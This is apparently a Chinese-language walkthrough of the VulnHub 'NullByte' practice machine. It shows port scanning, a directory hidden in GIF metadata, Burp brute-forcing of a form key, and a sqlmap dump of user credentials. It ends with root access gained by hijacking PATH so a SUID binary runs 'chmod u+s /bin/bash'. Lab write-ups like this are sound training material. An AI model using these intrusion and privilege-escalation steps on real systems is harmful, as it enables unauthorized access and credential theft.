vulnhub-nullbyte-类oscp练习

由 admin 发布
  • gif 隐藏信息
  • burp 爆破key
  • sql 注入
  • 环境变量提权

信息搜集

端口扫描

Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
80/tcp  open  http
111/tcp open  rpcbind
777/tcp open  multiling-http

目录扫描

扫描 80 端口目录得到 phpmyadmin

尝试弱口令爆破、漏洞利用等失败

之后下载主页的 main.gif 使用 exiftool 得到隐藏信息

➜  NullByte exiftool main.gif 
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

kzMb5nVYJw 为目录路径

image-20220806201355548

在网页源代码得到信息需要爆破

<!-- this form isn't connected to mysql, password ain't that complex --!>

burp 抓包,使用 /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 字典爆破得到结果

image-20220806201532871

将数据包保存为文件,使用 sqlmap 进行 sql 注入

sqlmap -r data --dump
----
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+
-----

base64 解码后得到密文

c6d6bd7ebf806f43c76acc3681703b81

明文为 omega

ROOT

ramses@NullByte:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
ramses@NullByte:/tmp$ /var/www/backup/procwatch # 根据回显结果判断为 ps 命令
  PID TTY          TIME CMD
18286 pts/0    00:00:00 procwatch
18287 pts/0    00:00:00 sh
18288 pts/0    00:00:00 ps
ramses@NullByte:/tmp$ echo "chmod u+s /bin/bash" > ps # 使用环境变量提权
ramses@NullByte:/tmp$ chmod +x ps
ramses@NullByte:/tmp$ export PATH=/tmp:$PATH
ramses@NullByte:/tmp$ /var/www/backup/procwatch
ramses@NullByte:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1105840 Nov 13  2014 /bin/bash # 再次执行后有了 s 权限为

验证

ramses@NullByte:/tmp$ /bin/bash -p
bash-4.3# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
proof.txt
bash-4.3# cat proof.txt 
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

暂无评论

发表评论